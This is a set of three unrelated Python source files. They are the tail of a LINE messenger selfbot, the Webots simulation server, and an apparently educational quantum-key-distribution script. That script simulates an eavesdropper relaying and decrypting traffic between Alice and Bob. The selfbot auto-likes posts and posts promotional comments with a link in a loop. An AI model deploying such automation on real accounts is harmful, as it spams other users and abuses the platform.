else:
pass
except:
pass
else:
pass
if op.type == 55:
try:
if ngintip['intip'][op.param1]==True:
if op.param1 in ngintip['target']:
Name = kr1.getContact(op.param2).displayName
if Name in ngintip['toong'][op.param1]:
pass
else:
ngintip['toong'][op.param1] += "\n• " + Name
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
kr1.sendText(op.param1, "Hallo.. " + "☞ " + nick[0] + " ☜" + "\nNah jangan ngintip mulu 😁. . .\nGabung Chat yux 😉")
else:
kr1.sendText(op.param1, "Hallo.. " + "☞ " + nick[1] + " ☜" + "\nJangan ngintip.. 😏. . .\nMasuk ayox... 😆😂😛")
else:
kr1.sendText(op.param1, "hallo.. " + "☞ " + Name + " ☜" + "\nJangan ngintip aja\nMasuk gabung chat ya...😋 😝")
else:
pass
else:
pass
except:
pass
else:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
count = 1
while True:
try:
for posts in kr1.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait['likeOn'] == True:
kr1.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
kr1.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = kr1.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
kr1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kr1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Already Liked Om"
time.sleep(0.60)
def likeme():
for zx in range(0,20):
hasil = kr1.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
kr1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kr1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Om"
while True:
try:
Ops = kr1.fetchOps(kr1.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(kr1.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
kr1.Poll.rev = max(kr1.Poll.rev, Op.revision)
bot(Op)
|
simulation_server.py
|
#!/usr/bin/env python3
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Webots simulation server."""
from async_process import AsyncProcess
from io import BytesIO
from pynvml import nvmlInit, nvmlShutdown, nvmlDeviceGetHandleByIndex, nvmlDeviceGetName, nvmlDeviceGetMemoryInfo, \
nvmlDeviceGetUtilizationRates, NVMLError
from requests import session
import asyncio
import errno
import json
import logging
import os
import psutil
import re
import shutil
import subprocess
import sys
import tempfile
import time
import threading
import tornado.ioloop
import tornado.httpserver
import tornado.web
import tornado.websocket
import traceback
import socket
import zipfile
if sys.platform == 'win32':
import wmi
elif sys.platform == 'darwin':
import platform
else: # assuming linux
import distro
SNAPSHOT_REFRESH = 1 # make a performance measurement every second
network_sent = 0
network_received = 0
def expand_path(path):
"""Expand user and environmental variables in a string."""
return os.path.expandvars(os.path.expanduser(path))
def mkdir_p(path):
"""Create a directory if it doesn't exit."""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def chmod_python_and_executable_files(directory):
"""Add executable permissions to Python and executable files."""
if sys.platform == 'win32':
return
for filename in os.listdir(directory):
fullname = os.path.join(directory, filename)
if os.path.isdir(fullname):
chmod_python_and_executable_files(fullname)
if filename.endswith('.py') or not os.path.splitext(filename)[1]:
os.chmod(fullname, 0o775)
class Snapshot:
"""This class stores instantaneous monitoring information on the machine."""
def __init__(self):
"""Create an empty instance of MonitorSnapshot."""
self.data = {'Timestamp': 0,
'Webots running': 0,
'Webots idle': 0,
'CPU load': 0,
'CPU memory': 0,
'GPU load compute': 0,
'GPU load memory': 0,
'GPU memory': 0,
'Swap': 0,
'Disk': 0,
'Network sent': 0,
'Network received': 0}
def write(self):
"""Save a snapshot into a file."""
if not config['monitorLogEnabled']:
return
global monitorFile
file = open(monitorFile, 'a')
file.write(str(self.data['Timestamp']) + ", ")
file.write(str(self.data['Webots running']) + ", ")
file.write(str(self.data['Webots idle']) + ", ")
file.write(str(self.data['CPU load']) + ", ")
file.write(str(self.data['CPU memory']) + ", ")
file.write(str(self.data['GPU load compute']) + ", ")
file.write(str(self.data['GPU load memory']) + ", ")
file.write(str(self.data['GPU memory']) + ", ")
file.write(str(self.data['Swap']) + ", ")
file.write(str(self.data['Disk']) + ", ")
file.write(str(self.data['Network sent']) + ", ")
file.write(str(self.data['Network received']) + "\n")
file.close()
class Client:
"""This class represents an instance of connected client."""
def __init__(self, client_websocket=None):
"""Create an instance of client."""
self.client_websocket = client_websocket
self.streaming_server_port = 0
self.webots_process = None
self.on_webots_quit = None
self.project_instance_path = ''
self.app = ''
self.world = ''
self.idle = True
def __del__(self):
"""Destroy an instance of client."""
if self.client_websocket:
self.client_websocket.close()
self.kill_webots()
self.cleanup_webots_instance()
def setup_project(self):
self.project_instance_path = config['instancesPath'] + str(id(self))
if hasattr(self, 'url'):
return self.setup_project_from_github()
else:
return self.setup_project_from_zip()
def setup_project_from_github(self):
if not self.url.startswith('webots://github.com/'):
logging.error('The URL argument should start with "webots://github.com/"')
return False
parts = self.url[20:].split('/')
length = len(parts)
if length < 6:
logging.error('Wrong Webots URL')
return False
username = parts[0]
repository = parts[1]
tag_or_branch = parts[2]
tag_or_branch_name = parts[3]
folder = '/'.join(parts[4:length - 2])
project = '' if length == 6 else '/' + parts[length - 3]
if parts[length - 2] != 'worlds':
logging.error('Missing worlds folder in Webots URL')
return False
filename = parts[length - 1]
if filename[-4:] != '.wbt':
logging.error('Wrong Webots URL: missing world file in ' + filename[-4:])
return False
self.world = filename
url = 'https://github.com/' + username + '/' + repository + '/'
if tag_or_branch == 'tag':
url += 'tags/' + tag_or_branch_name
elif tag_or_branch == 'branch':
url += 'trunk' if tag_or_branch_name == 'master' else 'branches/' + tag_or_branch_name
else:
logging.error('Wrong tag/branch in Webots URL: ' + tag_or_branch)
return False
url += '/' + folder
try:
path = os.getcwd()
except OSError:
path = False
mkdir_p(self.project_instance_path)
os.chdir(self.project_instance_path)
command = AsyncProcess(['svn', 'export', url])
sys.stdout.write('$ svn export ' + url + '\n')
sys.stdout.flush()
while True:
output = command.run()
if output[0] == 'x':
break
if output[0] == '2': # stderr
sys.stdout.write("\033[0;31m") # ANSI red color
sys.stdout.write(output[1:])
if output[0] == '2': # stderr
sys.stdout.write("\033[0m") # reset ANSI code
sys.stdout.flush()
logging.info('Done')
if tag_or_branch == 'branch' and tag_or_branch_name == 'master' and folder == '':
os.rename('trunk', repository)
if path:
os.chdir(path)
self.project_instance_path += project
return True
def setup_project_from_zip(self):
"""Setup a local Webots project to be run by the client."""
shutil.copytree(os.path.join(config['projectsDir'], self.app) + '/', self.project_instance_path)
hostFile = open(self.project_instance_path + "/host.txt", 'w')
hostFile.write(self.host)
hostFile.close()
if self.user1Id:
payload = {'project': self.app, 'key': self.key,
'user1Id': self.user1Id, 'user1Name': self.user1Name, 'user1Authentication': self.user1Authentication,
'user2Id': self.user2Id, 'user2Name': self.user2Name, 'customData': self.customData}
with session() as c:
response = c.post(self.host + '/ajax/download-project.php', data=payload)
if response.content.startswith(b'Error:'):
error = response.content.decode('utf-8')
if error.startswith('Error: no such directory: '):
return True # Use the default directory instead
logging.error("Failed to download project: " + error + "(host = " + self.host + ")")
return False
fp = BytesIO(response.content)
try:
with zipfile.ZipFile(fp, 'r') as zfp:
zfp.extractall(self.project_instance_path)
except zipfile.BadZipfile:
logging.error("Bad ZIP file:\n" + response.content.decode('utf-8'))
return False
chmod_python_and_executable_files(self.project_instance_path)
return True
def cleanup_webots_instance(self):
"""Cleanup the local Webots project not used any more by the client."""
if self.project_instance_path:
shutil.rmtree(self.project_instance_path)
def start_webots(self, on_webots_quit):
"""Start a Webots instance in a separate thread."""
def runWebotsInThread(client):
global config
world = self.project_instance_path + '/worlds/' + self.world
port = client.streaming_server_port
command = config['webots'] + ' --batch --mode=pause --minimize '
command += '--stream="port=' + str(port) + ';monitorActivity'
if not hasattr(self, 'url'):
if self.user1Authentication or not self.user1Id: # we are running our own or an anonymous simulation
command += ';controllerEdit'
if 'multimediaServer' in config:
command += ';multimediaServer=' + config['multimediaServer']
if 'multimediaStream' in config:
command += ';multimediaStream=' + config['multimediaStream']
if config['ssl']:
command += ';ssl'
command += '" ' + world
try:
client.webots_process = subprocess.Popen(command.split(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1, universal_newlines=True)
except Exception:
logging.error('Unable to start Webots: ' + command)
return
logging.info('[%d] Webots [%d] started: "%s"' % (id(client), client.webots_process.pid, command))
while 1:
if client.webots_process is None:
# client connection closed or killed
return
line = client.webots_process.stdout.readline().rstrip()
if line.startswith('open'): # Webots world is loaded, ready to receive connections
break
hostname = client.client_websocket.request.host.split(':')[0]
protocol = 'wss:' if config['ssl'] or config['portRewrite'] else 'ws:'
separator = '/' if config['portRewrite'] else ':'
asyncio.set_event_loop(asyncio.new_event_loop())
message = 'webots:' + protocol + '//' + hostname + separator + str(port) + '/'
client.client_websocket.write_message(message)
for line in iter(client.webots_process.stdout.readline, b''):
line = line.rstrip()
if line == 'pause':
client.idle = True
elif line == 'real-time' or line == 'step':
client.idle = False
elif line == '.':
client.client_websocket.write_message('.')
client.on_exit()
if self.setup_project():
self.on_webots_quit = on_webots_quit
threading.Thread(target=runWebotsInThread, args=(self,)).start()
else:
on_webots_quit()
def on_exit(self):
"""Callback issued when Webots quits."""
if self.webots_process:
logging.warning('[%d] Webots [%d] exited' % (id(self), self.webots_process.pid))
self.webots_process.wait()
self.webots_process = None
self.on_webots_quit()
def kill_webots(self):
"""Force the termination of Webots."""
if self.webots_process:
logging.warning('[%d] Webots [%d] was killed' % (id(self), self.webots_process.pid))
if sys.platform == 'darwin':
self.webots_process.kill()
else:
self.webots_process.terminate()
try:
self.webots_process.wait(5) # set a timeout (seconds) to avoid blocking the whole script
except subprocess.TimeoutExpired:
logging.warning('[%d] ERROR killing Webots [%d]' % (id(self), self.webots_process.pid))
self.webots_process.kill()
self.webots_process = None
class ClientWebSocketHandler(tornado.websocket.WebSocketHandler):
"""This class handles websocket connections."""
clients = set()
def check_origin(self, origin):
"""Allow to run the server on the same computer as the client."""
return True
@classmethod
def find_client_from_websocket(self, client_websocket):
"""Return client associated with a websocket."""
for client in self.clients:
if client.client_websocket == client_websocket:
return client
return None
@classmethod
def next_available_port(self):
"""Return a port number available for a new Webots WebSocket server."""
port = config['port'] + 1
while True:
if port > config['port'] + config['maxConnections']:
logging.error("Too many open connections (>" + str(config['maxConnections']) + ")")
return 0
found = False
for client in self.clients:
if port == client.streaming_server_port:
found = True
break
if found:
port += 1
continue
# try to create a server to make sure that port is available
testSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
testSocket.bind(('0.0.0.0', port))
found = True
except socket.error as e:
found = False
if e.errno == errno.EADDRINUSE:
logging.info('Port ' + str(port) + ' is already in use.')
else: # something else raised the socket.error exception
logging.info('Port ' + str(port) + ': ' + e)
finally:
testSocket.close()
if found:
return port
port += 1
def open(self):
"""Open a new connection for an incoming client."""
self.set_nodelay(True)
logging.info(self.request.host)
client = Client(client_websocket=self)
ClientWebSocketHandler.clients.add(client)
logging.info('[%d] New client' % (id(client),))
def on_close(self):
"""Close connection after client leaves."""
client = ClientWebSocketHandler.find_client_from_websocket(self)
if client:
logging.info('[%d] Client disconnected' % (id(client),))
client.kill_webots()
if client in ClientWebSocketHandler.clients:
ClientWebSocketHandler.clients.remove(client)
del client
def on_message(self, message):
"""Receive message from client."""
client = ClientWebSocketHandler.find_client_from_websocket(self)
if client:
data = json.loads(message)
if 'init' in data:
# setup client
client.streaming_server_port = ClientWebSocketHandler.next_available_port()
logging.info('data[init]=%s' % data['init'])
client.host = data['init'][0]
client.app = data['init'][1]
client.world = data['init'][2]
client.user1Id = data['init'][3]
client.user1Name = data['init'][4]
client.user1Authentication = data['init'][5]
client.user2Id = data['init'][6]
client.user2Name = data['init'][7]
client.customData = data['init'][8]
client.idle = True
# Check that client.host is allowed
host = client.host[8:] if client.host.startswith('https://') else client.host[7:]
n = host.find(':')
if n > 0:
host = host[:n]
keyFilename = os.path.join(config['keyDir'], host)
if os.path.isfile(keyFilename):
try:
keyFile = open(keyFilename, "r")
except IOError:
logging.error("Unknown host: " + host + " from " + self.request.remote_ip)
client.client_websocket.close()
return
client.key = keyFile.readline().rstrip(os.linesep)
keyFile.close()
else:
logging.warning("No key for: " + host)
logging.info('[%d] Setup client %s %s '
'(remote ip: %s, streaming_server_port: %s)'
% (id(client),
client.app,
client.world,
self.request.remote_ip,
client.streaming_server_port))
self.start_client()
elif "reset controller" in data:
relativeFilename = '/controllers/' + data['reset controller']
shutil.copyfile(config['projectsDir'] + '/' + client.app + relativeFilename,
client.project_instance_path + '/' + relativeFilename)
self.write_message('reset controller: ' + data['reset controller'])
logging.info('[%d] Reset file %s '
'(remote ip: %s, streaming_server_port: %s)'
% (id(client),
data['reset controller'],
self.request.remote_ip,
client.streaming_server_port))
elif 'start' in data: # checkout a github folder and run a simulation in there
client.streaming_server_port = ClientWebSocketHandler.next_available_port()
client.url = data['start']['url']
logging.info('Starting simulation from ' + client.url)
self.start_client()
def on_webots_quit(self):
"""Cleanup websocket connection."""
client = ClientWebSocketHandler.find_client_from_websocket(self)
if client and client.client_websocket:
client.client_websocket.close()
def start_client(self):
"""Start Webots."""
# let 10 seconds to start Webots
self.last_supervisor_activity = None
client = ClientWebSocketHandler.find_client_from_websocket(self)
client.start_webots(self.on_webots_quit)
class LoadHandler(tornado.web.RequestHandler):
"""Handle load requests."""
def get(self):
"""Return the current load of the simulation server."""
global current_load
self.write(str(current_load))
class MonitorHandler(tornado.web.RequestHandler):
"""Display the monitor web page."""
global config
global snapshots
global nvidia
def get(self):
"""Write the web page content."""
global cpu_load
global gpu_load_compute
global gpu_load_memory
memory = psutil.virtual_memory()
swap = psutil.swap_memory()
if nvidia:
nvmlHandle = nvmlDeviceGetHandleByIndex(0)
gpu = nvmlDeviceGetName(nvmlHandle).decode('utf-8')
gpu_memory = nvmlDeviceGetMemoryInfo(nvmlHandle)
gpu_ram = round(gpu_memory.total / (1024 * 1048576), 2)
gpu += " - " + str(gpu_ram) + "GB"
else:
gpu = "Not recognized"
ram = str(int(round(float(memory.total) / (1024 * 1048576)))) + "GB"
ram += " (swap: " + str(int(round(float(swap.total) / (1024 * 1048576)))) + "GB)"
real_cores = psutil.cpu_count(False)
cores_ratio = int(psutil.cpu_count(True) / real_cores)
cores = " (" + str(cores_ratio) + "x " + str(real_cores) + " cores)"
if sys.platform.startswith('linux'):
distribution = distro.linux_distribution()
os_name = 'Linux ' + distribution[0] + " " + distribution[1] + " " + distribution[2]
command = "cat /proc/cpuinfo"
all_info = subprocess.check_output(command, shell=True).decode('utf-8').strip()
for line in all_info.split("\n"):
if "model name" in line:
cpu = re.sub(".*model name.*:", "", line, 1)
break
elif sys.platform == 'win32':
computer = wmi.WMI()
os_info = computer.Win32_OperatingSystem()[0]
cpu = computer.Win32_Processor()[0].Name
os_name = os_info.Name.split('|')[0] + ", version " + os_info.Version
elif sys.platform == 'darwin':
os_name = 'macOS ' + platform.mac_ver()[0]
os.environ['PATH'] = os.environ['PATH'] + os.pathsep + '/usr/sbin'
command = 'sysctl -n machdep.cpu.brand_string'
cpu = subprocess.check_output(command).strip()
else: # unknown platform
os_name = 'Unknown'
cpu = 'Unknown'
self.write("<!DOCTYPE html>\n")
self.write("<html><head><meta charset='utf-8'/><title>Webots simulation server</title>")
self.write("<link rel='stylesheet' type='text/css' href='css/monitor.css'></head>\n")
self.write("<body><h1>Webots simulation server: " + socket.getfqdn() + "</h1>")
self.write("<h2>Host: " + os_name + "</h2>\n")
self.write("<p><b>CPU load: %g%%</b><br>\n" % cpu_load)
self.write(cpu + cores + "</p>\n")
self.write("<p><b>GPU load compute: %g%% — load memory: %g%%</b><br>\n" %
(gpu_load_compute, gpu_load_memory))
self.write(gpu + "</p>\n")
self.write("<p><b>RAM:</b><br>" + ram + "</p>\n")
self.write("<canvas id='graph' height='400' width='1024'></canvas>\n")
self.write("<script src='https://www.cyberbotics.com/harry-plotter/0.9f/harry.min.js'></script>\n")
self.write("<script>\n")
self.write("window.onload = function() {\n")
def appendData(label):
global snapshots
d = "{title:'" + label + "',values:["
for s in snapshots:
d += str(s.data[label]) + ','
return d[:-1] + "]},"
datas = ''
datas += appendData('Webots running')
datas += appendData('Webots idle')
datas += appendData('CPU load')
datas += appendData('CPU memory')
datas += appendData('GPU load compute')
datas += appendData('GPU load memory')
datas += appendData('GPU memory')
datas += appendData('Swap')
datas += appendData('Disk')
datas += appendData('Network sent')
datas += appendData('Network received')
datas = datas[:-1] # remove the last coma
self.write(" plotter({\n")
self.write(" canvas: 'graph',\n")
self.write(" datas:[ " + datas + "],\n")
self.write("""
labels:{
ypos:"left",
x:100,
y:[50,100],
marks:2
},
fill:"none",
opacity:0.5,
linewidth:3,
background:"#fff",
autoscale:"top",
grid:{
x:[0,100]
},
mouseover:{
radius:4,
linewidth:2,
bullet:"#444",
shadowbox:"1,1,0,#000",
axis:"x"
}
});""")
self.write("}\n")
self.write("</script>\n")
self.write("</body></html>")
def update_snapshot():
"""Compute a monitoring snapshot."""
global current_load
global network_sent
global network_received
global cpu_load
global gpu_load_compute
global gpu_load_memory
memory = psutil.virtual_memory()
swap = psutil.swap_memory()
disk = psutil.disk_usage('/')
n = psutil.net_io_counters()
new_network_sent = n.bytes_sent
new_network_received = n.bytes_recv
network_sent_rate = float(new_network_sent - network_sent) / (SNAPSHOT_REFRESH * 1000000) # expressed in MB/s
network_received_rate = float(new_network_received - network_received) / (SNAPSHOT_REFRESH * 1000000) # MB/s
network_sent = new_network_sent
network_received = new_network_received
global nvidia
if nvidia:
nvmlHandle = nvmlDeviceGetHandleByIndex(0)
gpu_memory = nvmlDeviceGetMemoryInfo(nvmlHandle)
gpu_ram_usage = round(100 * float(gpu_memory.used) / float(gpu_memory.total), 1)
else: # not supported
nvmlHandle = 0
gpu_ram_usage = 0
cpu_load = psutil.cpu_percent()
try:
gpu_load = nvmlDeviceGetUtilizationRates(nvmlHandle)
gpu_load_compute = gpu_load.gpu
gpu_load_memory = gpu_load.memory
except NVMLError: # not supported on some hardware
gpu_load_compute = 0
gpu_load_memory = 0
webots_idle = 0
webots_running = 0
for client in ClientWebSocketHandler.clients:
if client.idle:
webots_idle = webots_idle + 1
else:
webots_running = webots_running + 1
snapshot = Snapshot()
snapshot.data['Timestamp'] = int(time.time())
snapshot.data['Webots running'] = webots_running
snapshot.data['Webots idle'] = webots_idle
snapshot.data['CPU load'] = cpu_load
snapshot.data['CPU memory'] = memory.percent
snapshot.data['GPU load compute'] = gpu_load_compute
snapshot.data['GPU load memory'] = gpu_load_memory
snapshot.data['GPU memory'] = gpu_ram_usage
snapshot.data['Swap'] = swap.percent
snapshot.data['Disk'] = disk.percent
snapshot.data['Network sent'] = network_sent_rate
snapshot.data['Network received'] = network_received_rate
snapshot.write()
current_load = 0
for key, value in snapshot.data.items():
if key == 'Timestamp':
continue
if value > current_load:
current_load = value
snapshots.append(snapshot)
if len(snapshots) > 600: # display data for the last 10 minutes
del snapshots[0]
tornado.ioloop.IOLoop.current().add_timeout(int(time.time()) + SNAPSHOT_REFRESH, update_snapshot)
def main():
"""Start the simulation server."""
# the following config variables read from the config.json file
# are described here:
#
# port: local port on which the server is listening (launching webots instances).
# portRewrite: true if local ports are computed from 443 https/wss URLs (apache rewrite rule).
# sslKey: private key for a SSL enabled server.
# sslCertificate: certificate for a SSL enabled server.
# projectsDir: directory in which projects are located.
# keyDir: directory where the host keys needed for validation are stored.
# logDir: directory where the log files are written.
# monitorLogEnabled: specify if the monitor data have to be stored in a file.
# maxConnections: maximum number of simultaneous Webots instances.
# debug: debug mode (output to stdout).
#
global config
global snapshots
global nvidia
global network_sent
global network_received
global monitorFile
n = psutil.net_io_counters()
network_sent = n.bytes_sent
network_received = n.bytes_recv
snapshots = []
config['WEBOTS_HOME'] = os.getenv('WEBOTS_HOME', '../../..').replace('\\', '/')
config['webots'] = config['WEBOTS_HOME']
if sys.platform == 'darwin':
config['webots'] += '/Contents/MacOS/webots'
elif sys.platform == 'win32':
config['webots'] += '/msys64/mingw64/bin/webots.exe'
else: # linux
config['webots'] += '/webots'
if 'projectsDir' not in config:
config['projectsDir'] = config['WEBOTS_HOME'] + '/projects/samples/robotbenchmark'
else:
config['projectsDir'] = expand_path(config['projectsDir'])
if 'keyDir' not in config:
config['keyDir'] = 'key'
else:
config['keyDir'] = expand_path(config['keyDir'])
if 'port' not in config:
config['port'] = 2000
if 'maxConnections' not in config:
config['maxConnections'] = 100
if 'debug' not in config:
config['debug'] = False
os.environ['WEBOTS_FIREJAIL_CONTROLLERS'] = '1'
config['instancesPath'] = tempfile.gettempdir().replace('\\', '/') + '/webots/instances/'
# create the instances path
if os.path.exists(config['instancesPath']):
shutil.rmtree(config['instancesPath'])
mkdir_p(config['instancesPath'])
# logging system
log_formatter = logging.Formatter('%(asctime)-15s [%(levelname)-7s] %(message)s')
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
config['logDir'] = 'log' if 'logDir' not in config else expand_path(config['logDir'])
simulationLogDir = os.path.join(config['logDir'], 'simulation')
logFile = os.path.join(simulationLogDir, 'output.log')
try:
if not os.path.exists(simulationLogDir):
os.makedirs(simulationLogDir)
file_handler = logging.StreamHandler(sys.stdout) if config['debug'] else \
logging.handlers.RotatingFileHandler(logFile, maxBytes=500000, backupCount=10)
file_handler.setFormatter(log_formatter)
file_handler.setLevel(logging.INFO)
root_logger.addHandler(file_handler)
except (OSError, IOError) as e:
sys.exit("Log file '" + logFile + "' cannot be created: " + str(e))
# disable tornado.access INFO logs
tornado_access_log = logging.getLogger('tornado.access')
tornado_access_log.setLevel(logging.WARNING)
# create monitor.csv used by Snapshot if needed
if 'monitorLogEnabled' not in config:
config['monitorLogEnabled'] = True
if config['monitorLogEnabled']:
monitorFile = os.path.join(simulationLogDir, 'monitor.csv')
try:
if not os.path.exists(simulationLogDir):
os.makedirs(simulationLogDir)
file = open(monitorFile, 'w')
file.write("Timestamp, Webots running, Webots idle, CPU load, CPU memory, "
"GPU load compute, GPU load memory, GPU memory, Swap, Disk, Network sent, Network received\n")
file.close()
except (OSError, IOError) as e:
logging.error("Log file '" + monitorFile + "' cannot be created: " + str(e))
# startup janus server if needed
if 'multimediaServer' in config:
subprocess.Popen(["/opt/janus/bin/janus"])
# startup the server
logging.info("Running simulation server on port %d" % config['port'])
handlers = []
handlers.append((r'/monitor', MonitorHandler))
handlers.append((r'/client', ClientWebSocketHandler))
handlers.append((r'/load', LoadHandler))
handlers.append((r'/(.*)', tornado.web.StaticFileHandler,
{'path': config['WEBOTS_HOME'] + '/resources/web/server/www',
'default_filename': 'index.html'}))
application = tornado.web.Application(handlers)
if 'sslCertificate' in config and 'sslKey' in config:
config['ssl'] = True
ssl_certificate = os.path.abspath(expand_path(config['sslCertificate']))
ssl_key = os.path.abspath(expand_path(config['sslKey']))
ssl_options = {"certfile": ssl_certificate, "keyfile": ssl_key}
http_server = tornado.httpserver.HTTPServer(application, ssl_options=ssl_options)
else:
config['ssl'] = False
http_server = tornado.httpserver.HTTPServer(application)
if 'portRewrite' not in config:
config['portRewrite'] = False
http_server.listen(config['port'])
message = "Simulation server running on port %d (" % config['port']
if not config['ssl']:
message += 'no '
message += 'SSL)'
print(message)
sys.stdout.flush()
try:
nvmlInit()
nvidia = True
except NVMLError:
nvidia = False
update_snapshot()
try:
tornado.ioloop.IOLoop.current().start()
except Exception:
logging.info(traceback.format_exc())
for client in ClientWebSocketHandler.clients:
del client
if nvidia:
nvmlShutdown()
if sys.platform == 'win32' and sys.version_info >= (3, 8):
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
if sys.platform == 'linux2':
# kill all the existing instances of Webots to avoid conflicts with web socket port
os.system("killall -q webots-bin")
# specify the display to ensure Webots can be executed even if this script is started remotely from a ssh session
if "DISPLAY" not in os.environ:
os.environ["DISPLAY"] = ":0"
# ensure we are in the script directory
os.chdir(os.path.dirname(os.path.realpath(__file__)))
argc = len(sys.argv)
if argc == 1:
config_json = 'config/simulation/default.json'
elif argc == 2:
config_json = sys.argv[1]
else:
sys.exit('Too many arguments.')
with open(config_json) as config_file:
config = json.load(config_file)
if __name__ == '__main__':
main()
|
EvaClient.py
|
# Copyright (c) 2016 Gabriel Oliveri (<gabrieloandco@gmail.com>)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import socket
import pickle
import BobClass
import threading
import time
import select
import Queue
from ForLoopEncrypt import *
from XorEncrypt import *
rLock = threading.Lock()
breaking = False
key = 0
def EvaTunnel(blocks,connecttoeva, connecttoalice,start_updating,stop_updating,stop_receivingeva,stop_receivingbob,breakevent):
breaking = False
host = '192.168.0.18'
port = 5001
s = socket.socket()
s.bind((host,port))
s.listen(2)
print "Tunneling Started."
connecttoeva.set()
ceva, addreva = s.accept()
print "Eva address is:" + str(addreva)
cbob, addrbob = s.accept()
connecttoalice.set()
print "Bob address is:" + str(addrbob)
receivedfromeva = threading.Event()
receivedfrombob = threading.Event()
qdatabob = Queue.Queue()
qdataeva = Queue.Queue()
RFET = threading.Thread(target=ReceiveFrom, args = (blocks,ceva,receivedfromeva,start_updating,stop_receivingeva,stop_updating,qdataeva,"Eva",breakevent))
RFBT = threading.Thread(target=ReceiveFrom, args = (blocks,cbob,receivedfrombob,start_updating,stop_receivingbob,stop_updating,qdatabob,"Bob",breakevent))
RFET.start()
RFBT.start()
while not breaking:
if receivedfromeva.is_set():
dataeva = qdataeva.get()
cbob.send(dataeva)
print "Sent to Bob" + dataeva
receivedfromeva.clear()
if receivedfrombob.is_set():
databob = qdatabob.get()
ceva.send(databob)
print "Sent to Eva" + databob
receivedfrombob.clear()
if breakevent.is_set():
breaking = True
RFET.join()
RFBT.join()
ceva.close()
cbob.close()
s.close()
def ReceiveFrom(blocks,socket,receivedfrom,start_updating,stop_receivingfrom,stop_updating,qdatafrom,person,breakevent,block=False):
breaking = False
while not breaking:
datafrom = socket.recv(324*(1+blocks)/2)
qdatafrom.put(datafrom)
print "Received from: " + person + datafrom
receivedfrom.set()
if not datafrom:
breaking = True
breakevent.set()
if datafrom == "R3c1V3!":
stop_receivingfrom.set()
stop_updating.clear()
start_updating.set()
if not stop_receivingfrom.is_set():
print DecryptMessage(datafrom,start_updating)
if block:
stop_updating.wait()
def DecryptMessage(data,start_updating):
global key
if not start_updating.is_set():
try:
print "key: " + str(key)
print "message: " + ForLoopDecrypt(data,key)[0:20]
except:
print "Couldn't Decrypt"
else:
pass
def UpdateKey(blocks,socketalice,socketeva,stop_receivingbob,stop_receivingeva,stop_receivingfromtunnel,stop_receivingfromalice,stop_updating,start_updating,start_clock,breakingevent):
global key
breaking = False
def uk():
global key
try:
start_updating.wait()
stop_receivingfromalice.wait()
stop_receivingbob.wait()
stop_receivingeva.wait()
stop_receivingfromtunnel.wait()
stop_updating.clear()
rLock.acquire()
print "Updating"
ready = select.select([socketalice],[],[],3)
if ready[0]:
AliceMbits = socketalice.recv(324*(1+blocks)/2)
